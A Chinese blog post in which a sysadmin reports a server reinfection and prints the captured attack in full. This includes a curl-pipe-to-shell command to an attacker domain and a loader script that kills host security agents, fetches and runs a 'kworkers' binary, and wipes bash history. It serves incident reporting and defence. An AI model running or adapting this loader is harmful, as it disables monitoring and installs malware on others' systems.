服务器被入侵,执行了2个非常危险的命令

最新推荐文章于 2024-05-29 21:02:04 发布
最新推荐文章于 2024-05-29 21:02:04 发布
阅读量3.1k 收藏
点赞数
分类专栏: Centos 文章标签: linux centos ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MRQ1734/article/details/118380267
版权

机器之前中过木马,手动清除了,以为没事了,就没重装系统

今天发现又被登录,执行了2个命令

sh -c 'curl | http://m.windowsupdatesupport.org/d/loader.sh|sh'

sh -c \'curl | http://m.windowsupdatesupport.org/d/loader.sh|sh\'

可惜2个命令没有执行成功,因为机器被我屏蔽外网了

用浏览器下载了loader.sh,脚本如下:

ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs  dirname  | xargs  rm -rf
ps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs  dirname  | xargs  rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs  dirname  | xargs  rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs  dirname  | xargs  rm -rf
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs  -I {}  kill -9 {}
ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs  -I {}  kill -9 {}

###此处是服务器的监控程序,入侵者想删掉我们机器的监控程序

rm -rf /usr/local/xxx
rm -rf /usr/local/xxxx
rm -rf /usr/local/xxxx


ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs  -I {}  kill -9 {}
domainroota=m.windowsupdatesupport.org

mkdir ~/.git
mkdir ./.git
gitdir=~/.git

if [ -d ~/.git ]; then
  gitdir=~/.git
fi
if [ -d ./.git ]; then
  gitdir=./.git
fi

curl  http://$domainroota/d/kworkers -o $gitdir/kworkers
chmod 777 $gitdir/kworkers
if [ -e  /.dockerenv ]
then
  $gitdir/kworkers
else
  nohup $gitdir/kworkers >>$gitdir/.log&
fi

sed -i '/$domainroota/d' ~/.bash_history
 

摸鱼手会滑
关注
专栏目录
titan:一个简单的研究项目
05-28
技术栈 用户名:gust ,密码:123456 前端 mpvue + iview + vue-router + vuex + echarts 后端 spring + springmvc + hibernate + mysql + redis 项目结构 ├── titan_core // 封装核心框架 ├── titan_crawler // 网页爬虫 ├── titan_monitor // 系统监控 ├── titan_quartz // 定时任务 ├── titan_server // 接口服务 └── titan_web // 后台页面 效果展示 系统登录 用户管理 用户编辑 头像编辑 资源管理 内
titanagent服务导致oracle数据库集群cssd进程无法启动
dba笔记
05-05 3382
titanagent服务导致oracle数据库集群cssd进程无法启动
一次系统宕机认识系统日志
yxkong的专栏
06-08 6915
今天开发小伙伴给我说,哥,你帮我看下吧,系统无缘无故的宕机了。之前跑了一个多月好好的。我问了下这台机器的配置是啥?虚拟机:1核2Gjvm配置: xms:1g xmx:1g我就开始着手查看监控指标怎么样?   监控系统这两天在升级,暂时看不了;  开发反馈,load在1左右,cpu高峰也就80%,我先信了。现场有无保留(堆栈信息)?   没有OOM的输出gc日志有没有?  有,gc看着都正常jvm的errorFile呢?没有配置。好吧。这些都没有咋排
深入理解Linux守护进程
cuixie2370的博客
10-08 266
Linux服务器在启动时需要启动很多系统服务,它们向本地和网络用户提供了Linux的系统功能接口,直接面向应用程序和用户。提供这些服务的程序是由运行在后台的守护进程(daemons)来执行的。守...
对外映射的PC 或者服务器,安装检测漏扫软件
weixin_45605787的博客
06-17 970
$URL=‘https://download.qingteng.cn/plugins/windows/x86_64/v3.400.203/27/TitanAgent_for_All_x86_64.exe’; FILE=FILE=FILE=env:temp + ‘\TitanAgent_for_All.exe’????(New-Object System.Net.WebClient).DownloadFile($URL, $FILE)); $PARAM = " --silent=yes --cover-con
linux agent 自重启脚本
龙遥的世界
04-01 1529
#!/bin/bash # # chkconfig: - 57 75 # description: test service #!/bin/sh JAVA_OPTS="-Duser.timezone=GMT+8 -server -Xms512m -Xmx512m -Xloggc:agent.log" APP_LOG=/home/monitor/alert-agent/ APP_HOME=/ho
11个步骤完美排查服务器是否已经被入侵.doc
08-24
服务器入侵检测与恢复 服务器安全是 Linux 运维工程师的头等大事,以下是 11 个步骤完美排查服务器是否已经被入侵的详细信息: 步骤 1: 查看日志信息 入侵者可能会删除机器的日志信息,查看日志信息是否还存在或者...
php在服务器执行exec命令失败的解决方法
10-28
在php开发过程中,执行exec命令可能会因为服务器的安全限制而执行失败。由于安全原因,默认情况下,服务器通常是...同时,对于服务器的安全管理也应当加强,比如使用防火墙、入侵检测系统等工具来提高服务器的安全性。
Linux入侵常用命令之防黑客示例代码
09-15
这个命令会在服务器上创建一个名为`rankuplog_time.php`的文件,其中的PHP代码允许黑客通过POST请求的md5字段执行任意命令。 2. **跨站浏览**: 黑客可能尝试列出不同用户的文件,如`ls -la /www/users/`,来寻找...
记一次入侵Linux服务器和删除木马程序的经历
09-15
例如文中提到的服务器流量突然飙升至800Mbps,远超日常水平,这通常是入侵活动的一个明显迹象。 - **进程检查**:使用`top`等工具动态查看服务器上的运行进程,可以快速定位资源占用异常的进程。如案例中发现了一个...
青藤主机自适应平台Agent安装手册.pdf
03-29
青藤云安装说明书
青藤云安全-容器安全指南及解决方案.pdf
08-09
青藤云安全-容器安全指南及解决方案.pdf
Windows服务器中毒或被入侵的快速诊断.pdf
09-28
快速诊断和处理 Windows 服务器中毒或被入侵问题的方法可以分为三个步骤:可疑文件诊断分析、可疑启动项诊断分析和注册表查看启动项。通过这三个步骤,可以快速判断系统是否有中毒或被入侵的迹象,并采取相应的措施...
青藤HIDS一键安装
最新发布
leeezp的博客
05-29 3万+
青藤HIDS一键安装脚本
菜鸟在linux中安装titan的经验分享
qq_42016265的博客
07-21 1万+
Titan安装经验心得: 1:很重要的一点就是linux能连上网。因为这在安装某些东西的时候非常方便省事,是非常省事(在杨大佬那里学到的) 怎么联网:虚拟机--设置--网络适配器--选择“NAT”模式,一定要点右下角“确定”           再点击Ubuntu右上角上网符号,点击编辑连接,选择有线连接。(前提是你的Windows系统是能够上网的)          ...
青藤云安全防护安装
liu876049930的博客
06-21 3272
青云 安全防护
关于一起linux secure安全日志写入异常分析处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
05-20 1万+
一、问题描述 检查发现2022年5月份的secure日志里混入了2021年10月份的日志信息,很是不解。 二、分析出来 日志报错: sshd[17263]: Did not receive identification string from 192.168.1.1 #表1.1ssh本地主机建立连接时,返回时出现问题,认证信息丢弃 2)查看与绕行相关的日志,发现异常,日志被写入旧的脏数据 其中: The imjournal module bellow is now used as a
Linux 几条强大命令的学习
MrTitan的专栏
09-04 2191
最近今天陆续学习了几条强大的Linux命令,记录下学习资料: find+xargs+grep:http://www.cnblogs.com/skynet/archive/2010/12/25/1916873.html awk:处理列格式文件利器 http://coolshell.cn/articles/9070.html sed:处理行式文件利器 http:/
Linux服务器 OOM 分析
康师傅没有眼泪
11-06 2777
Linux有一个特性:OOM Killer,一个保护机制,用于避免在内存不足的时候不至于出现严重问题,把一些无关的进程优先杀掉,即在内存严重不足时,系统为了继续运转,内核会挑选一个进程,将其杀掉,以释放内存,缓解内存不足情况,不过这种保护是有限的,不能完全的保护进程的运行。当low memory耗尽,不管high memory剩多少,oom-killer都会杀死进程,以保持系统的正常运行。告警内容: log.sys.oom(max,120s) > 0,当前值:1.00,资源类型:服务器(n9e),
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值